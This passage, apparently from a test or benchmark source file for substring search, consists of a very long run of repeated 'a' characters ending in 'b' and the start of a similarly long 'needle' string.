aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaab"
needle = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa